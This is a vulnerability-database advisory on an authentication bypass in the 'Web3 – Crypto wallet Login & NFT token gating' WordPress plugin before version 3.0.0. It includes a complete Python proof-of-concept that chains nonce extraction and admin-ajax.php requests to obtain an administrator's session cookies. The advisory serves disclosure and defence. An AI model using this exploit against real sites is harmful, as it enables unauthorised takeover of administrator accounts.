WordPress Plugin Vulnerabilities
Web3 – Crypto wallet Login & NFT token gating < 3.0.0 - Authentication Bypass
Description
The plugin is vulnerable to an authentication bypass due to incorrect authentication checking in the login flow in functions 'handle_auth_request' and 'hadle_login_request'. This makes it possible for non authenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username.
Proof of Concept
Run the following Python script: ``` import requests import re URL_BASE = "http://localhost:8083" LOGIN_PATH="/wp-login.php" USERNAME = "admin" def get_login_page(): response = requests.get(f"{URL_BASE}/wp-login.php") nonce = extract_nonce(response.text) return response.cookies, nonce def extract_nonce(html_content): pattern = r'\"wp_nonce\":\"(.*?)\"' match = re.search(pattern, html_content) if match: print("Website nonce:", match.group(1)) return match.group(1) else: raise ValueError("Nonce not found in the HTML content.") def post_data(cookies, nonce): headers = { } data = { "action": "type_of_request", "request": "login", "address": USERNAME, "mo_web3_verify_nonce": nonce } response = requests.post(f"{URL_BASE}/wp-admin/admin-ajax.php", headers=headers, data=data, cookies=cookies) random_string = extract_random_string(response.text) return random_string def extract_random_string(response_content): pattern = r'Random string: (\w+)' match = re.search(pattern, response_content) if match: print("User nonce:", match.group(1)) return match.group(1) else: raise ValueError("Random string not found in the response content.") def post_with_random_string(cookies, nonce, random_string): headers = { } data = { "address": USERNAME, "nonce": random_string, "mo_web3_hiddenform_nonce": nonce } response = requests.post(f"{URL_BASE}/wp-admin/admin-ajax.php", headers=headers, data=data, cookies=cookies, allow_redirects=False) return response.cookies def print_cookies(cookies_jar): for cookie in cookies_jar: print(f"{cookie.name}: {cookie.value}") def main(): cookies, nonce = get_login_page() random_string = post_data(cookies, nonce) new_cookies = post_with_random_string(cookies, nonce, random_string) print("----------------") print("Cookies:") print_cookies(new_cookies) if __name__ == "__main__": main() ```
Affects Plugins
References
CVE
Classification
Type
AUTHBYPASS
OWASP top 10
CWE
Miscellaneous
Original Researcher
vicent ribas
Submitter
vicent ribas
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2024-01-17 (about 3 months ago)
Added
2024-01-17 (about 3 months ago)
Last Updated
2024-01-17 (about 3 months ago)